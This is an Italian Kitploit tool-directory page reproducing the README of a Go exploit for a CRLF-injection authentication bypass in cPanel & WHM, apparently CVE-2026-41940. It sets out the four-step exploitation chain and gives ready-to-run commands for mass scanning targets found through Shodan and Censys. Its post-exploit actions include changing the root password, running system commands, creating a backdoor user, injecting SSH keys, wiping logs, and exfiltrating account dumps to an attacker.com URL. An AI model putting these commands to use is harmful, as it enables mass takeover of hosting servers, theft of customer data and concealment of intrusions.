Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Autenticazione e AutorizzazioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit PoC per CVE-2026-41940, un bypass dell'autenticazione di cPanel & WHM tramite iniezione CRLF. Include scansione di massa, azioni post-exploitation e una shell interattiva per test autorizzati.

Vedi RepositorySito web
213 mesi faNon ancora revisionato

CVE-2026-41940 Exploit PoC – Bypass dell'autenticazione cPanel & WHM

CVE-2026-41940 CVSS Go Version License

Strumento di: Ishan Oshada | GitHub

⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI. L'uso non autorizzato è illegale.

1


📋 Indice

  • Panoramica della vulnerabilità
  • Catena di sfruttamento
  • Funzionalità
  • Installazione
  • Avvio rapido
  • Esempi di utilizzo (tabella)
  • Azioni post-exploit
  • Comandi della shell interattiva
  • Scansione di massa con urls.txt
  • Esempi di output
  • Riferimento opzioni
  • Versioni interessate
  • Compilazione per tutte le piattaforme
  • FAQ e risoluzione dei problemi
  • Disclaimer
  • Autore

2

Panoramica della vulnerabilità

CVE-2026-41940 è una vulnerabilità di iniezione CRLF in cPanel & WHM (versioni < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

La funzione saveSession() scrive i dati della sessione dopo aver applicato filter_sessiondata(), ma il filtro viene applicato troppo tardi. Iniettando caratteri CRLF (\r\n) all'interno dell'header Authorization: Basic, un attaccante può avvelenare il file di sessione su disco con coppie chiave-valore arbitrarie (ad es., hasroot=1, tfa_verified=1, user=root).

Quando la sessione avvelenata viene successivamente caricata, cPanel/WHM concede accesso root completo senza alcuna password.

Punteggio CVSS: 10.0 (CRITICO)

  • Vettore di attacco: Rete
  • Complessità dell'attacco: Bassa
  • Privilegi richiesti: Nessuno
  • Interazione dell'utente: Nessuna
  • Riservatezza: Alta
  • Integrità: Alta
  • Disponibilità: Alta

Catena di sfruttamento (4 fasi)


Funzionalità

  • ✅ Scansione singola e di massa (input da file, pipe da stdin)
  • ✅ Scansione multi-thread (controllo della concorrenza fino a 100+ thread)
  • ✅ Modalità verbose (--verbose) – mostra richieste/risposte HTTP complete
  • ✅ Output JSON (salvataggio automatico quando viene trovato un target vulnerabile)
  • ✅ 10 azioni post-exploit (vedi tabella sotto)
  • ✅ Cross-platform (Windows, Linux, macOS)
  • ✅ Nessuna dipendenza esterna (solo libreria standard Go)
  • ✅ Output terminale colorato con risultati in riquadri chiari
  • ✅ Persistenza della sessione – meccanismo keep-alive
  • ✅ Shell WHM interattiva con cronologia dei comandi

Installazione

Prerequisiti

  • Go 1.20 o superiore (Download)

Clonare il repository

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Compilare l'eseguibile

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Esecuzione diretta (senza compilazione)

root@kitploit:~
go run main.go -u https://target.com:2087

Binari precompilati (modo più rapido)

Invece di compilare dal sorgente, puoi scaricare direttamente gli eseguibili stabili più recenti dal repository. Questi vengono generati automaticamente a ogni aggiornamento:

Nota: Se usi Linux o macOS, ricorda di concedere i permessi di esecuzione dopo il download:


Avvio rapido

root@kitploit:~
# Scansione di base
go run main.go -u https://target.com:2087

# Elenca tutti gli account cPanel
go run main.go -u https://target.com:2087 -action list

# Shell WHM interattiva
go run main.go -u https://target.com:2087 -action shell

# Scansione di massa con urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Esempi di utilizzo (tabella)


Azioni post-exploit


Comandi della shell interattiva

Una volta dentro la shell (-action shell), usa questi comandi:


Scansione di massa con urls.txt

Il repository include urls.txt con 1000 target di esempio per la scansione di massa.

Formato urls.txt

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

Comandi di scansione di massa

root@kitploit:~
# Scansione di massa di base (10 thread)
go run main.go -l urls.txt

# Scansione di massa veloce (50 thread, salva risultati)
go run main.go -l urls.txt -t 50 -o results.json

# Scansione di massa con azione post-exploit
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Scansione di massa con output verbose
go run main.go -l urls.txt -t 10 --verbose

# Scansione di massa con timeout aumentato (reti lente)
go run main.go -l urls.txt -t 30 -timeout 30

Genera urls.txt da solo

root@kitploit:~
# Genera intervallo IP (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# Genera intervallo IP (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Da Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Da Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

Esempi di output

Target vulnerabile trovato

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    TARGET VULNERABILE RILEVATO                 ║
╠════════════════════════════════════════════════════════════════╣
║ Target: https://target.example.com:2087                        ║
║ Token: /cpsess1234567890                                       ║
║ Versione: 11.76.0.22                                           ║
║ Sessione: :od2aMhg5zJeQunUy...                                 ║
║ URL API: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Azione: LIST
    • Utente: admin | Dominio: example.com
    • Utente: backup | Dominio: backup.example.com
    • Utente: client1 | Dominio: client1.com

Output di riepilogo

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    RIEPILOGO SCANSIONE COMPLETATA
════════════════════════════════════════════════════════════════════
  Totale target scansionati: 1000
  Target vulnerabili: 47
  Tempo trascorso: 125.34 secondi

TARGET VULNERABILI:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Versione: 11.76.0.22
      Sessione: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Versione: 11.86.0.15
      Sessione: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Versione: 11.118.0.42
      Sessione: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Risultati salvati in: results.json

Riferimento opzioni


Versioni interessate


Compilazione per tutte le piattaforme

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

Compilazione incrociata per tutte le piattaforme

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

Struttura delle directory

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # Documentazione
├── bin/                # Eseguibili precompilati multi-piattaforma 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # Codice sorgente principale
├── urls.txt            # 1000 target di esempio
├── go.mod              # File modulo Go
├── .gitignore          # File Git ignore
└── results.json        # File di output (generato)

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.

L'accesso non autorizzato a sistemi informatici è illegale ai sensi di:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act - Regno Unito
  • Information Technology Act - India
  • Leggi simili in tutto il mondo

L'autore non si assume alcuna responsabilità per un uso improprio. Utilizzo a proprio rischio.

Utilizzando questo strumento, accetti di avere la dovuta autorizzazione per testare i sistemi target.


Autore

Ishan Oshada

  • 🔗 Sito web: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 Email: [email protected]

Views

Supporto

Se trovi utile questo strumento:

  • ⭐ Metti una stella al repository su GitHub
  • 🔄 Condividi con la community di sicurezza
  • 📝 Segnala problemi tramite GitHub Issues

Buon hacking! 🚀

Ricorda: Da un grande potere deriva una grande responsabilità. Usalo eticamente.

Scarica lo strumento
FaseAzioneDescrizione
1POST /login/?login_only=1Richiedi cookie di sessione pre-autenticazione con credenziali errate
2GET / + header Authorization con CRLFAvvelena il file di sessione con hasroot=1, user=root, ecc.
3GET /scripts2/listacctsForza la cache di sessione a ricaricare il file avvelenato (propagazione)
4GET /cpsess<TOKEN>/json-api/versionVerifica l'accesso root – successo = 200 + dati versione
PiattaformaPosizione
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#ScopoComando
1Scansione di base su singolo targetgo run main.go -u https://target.com:2087
2Elenca tutti gli account cPanelgo run main.go -u https://target.com:2087 -action list
3Cambia la password di rootgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Esegui comando di sistemago run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Ottieni informazioni sul servergo run main.go -u https://target.com:2087 -action info
6Crea utente backdoorgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Crea token API (furtivo)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Inietta chiave SSHgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Dump ed esfiltrazione accountgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Cancella log e copri le traccego run main.go -u https://target.com:2087 -action wipe
11Shell WHM interattivago run main.go -u https://target.com:2087 -action shell
12Scansione di massa da filego run main.go -l urls.txt -t 20 -o results.json
13Salva risultati in JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Abilita debug verbosego run main.go -u https://target.com:2087 --verbose
15Pipe da altri strumenticat urls.txt | go run main.go -t 20
16Aumenta timeoutgo run main.go -u https://target.com:2087 -timeout 30
AzioneFlagDescrizioneLivello di furtività
list-action listElenca tutti gli account cPanelBasso
passwd-action passwd -passwd NEWPASSCambia la password di root (rumoroso)Alto (rilevabile)
cmd-action cmd -cmd "id"Esegue comandi del sistema operativoMedio
info-action infoMostra hostname, carico, versioneBasso
adduser-action adduser -new-user U -new-domain DCrea utente cPanel backdoorMedio
apitoken-action apitoken [-tokenname NAME]Genera token API persistenteMolto basso
sshkey-action sshkey -sshkey "ssh-rsa..."Inietta chiave pubblica SSH in rootMolto basso
dumpacct-action dumpacct -dumpuser USER -exfil URLBackup ed esfiltrazione accountMedio
wipe-action wipeDisabilita WAF, cancella log, pulisce cronologiaCopre le tracce
shell-action shellShell WHM interattivaBasso
ComandoDescrizioneEsempio
accountsElenca tutti gli account cPanelaccounts
passwd <pass>Cambia la password di rootpasswd MyNewPass123!2006
exec <command>Esegue comando di sistemaexec "cat /etc/passwd"
infoMostra informazioni sul serverinfo
versionMostra la versione di cPanelversion
helpMostra i comandi disponibilihelp
exitEsci dalla shellexit
OpzioneTipoPredefinitoDescrizione
-ustring-URL del target (ad es., https://example.com:2087)
-lstring-File con i target (uno per riga)
-tint10Numero di thread concorrenti
-actionstring-Azione post-exploit
-passwdstring-Nuova password (per passwd/adduser)
-cmdstring-Comando da eseguire (per azione cmd)
-new-userstring-Nome utente per azione adduser
-new-domainstring-Dominio per azione adduser
-tokennamestring-Nome per token API (azione apitoken)
-sshkeystring-Chiave SSH pubblica da iniettare (azione sshkey)
-dumpuserstring-Nome utente da eseguire il backup (azione dumpacct)
-exfilstring-URL remoto per l'esfiltrazione (azione dumpacct)
-ostring-File JSON di output (salvataggio automatico quando trovato)
--verboseboolfalseMostra richieste/risposte HTTP
-hboolfalseMostra il menu di aiuto
RamoVersione correttaVulnerabile <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4